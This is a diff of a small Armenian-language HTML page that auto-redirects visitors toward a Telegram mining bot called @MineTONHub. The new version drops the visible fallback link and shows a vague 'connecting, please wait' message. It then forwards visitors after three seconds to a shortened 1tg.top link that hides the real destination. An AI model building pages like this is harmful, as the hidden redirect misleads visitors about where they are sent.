--- a/index.html
+++ b/index.html
@@ -1,25 +1,27 @@
 <!DOCTYPE html>
-<html lang="en">
+<html lang="hy">
 <head>
-  <meta charset="UTF-8" />
-  <title>Redirecting…</title>
-  <script>
-    function redirectInSteps() {
-      setTimeout(function () {
-        // Քայլ 1․ ուղարկում է Telegram ալիք
-        window.location.href = "https://t.me/MineTONHub";
-      }, 1000);
-
-      setTimeout(function () {
-        // Քայլ 2․ հետո ուղարկում է բոտ՝ նույն պատուհանում
-        window.location.href = "https://1tg.top/7h5p7T_mwhlom?i=copy";
-      }, 4000);
+  <meta charset="UTF-8">
+  <title>Բացվում է @MineTONHub</title>
+  <style>
+    body {
+      font-family: Arial, sans-serif;
+      text-align: center;
+      padding-top: 100px;
+      color: #444;
     }
-
-    window.onload = redirectInSteps;
+    h1 {
+      color: #0088cc;
+    }
+  </style>
+  <script>
+    setTimeout(function () {
+      window.location.href = "https://1tg.top/7h5p7T_mwhlom?i=copy";
+    }, 3000);
   </script>
 </head>
 <body>
-  <p>Եթե ավտոմատ չտեղափոխվեցիր, սեղմիր <a href="https://1tg.top/7h5p7T_mwhlom?i=copy">այս հղման վրա</a></p>
+  <h1>📡 @MineTONHub</h1>
+  <p>Միացման գործընթաց… Խնդրում ենք սպասել։</p>
 </body>
 </html>
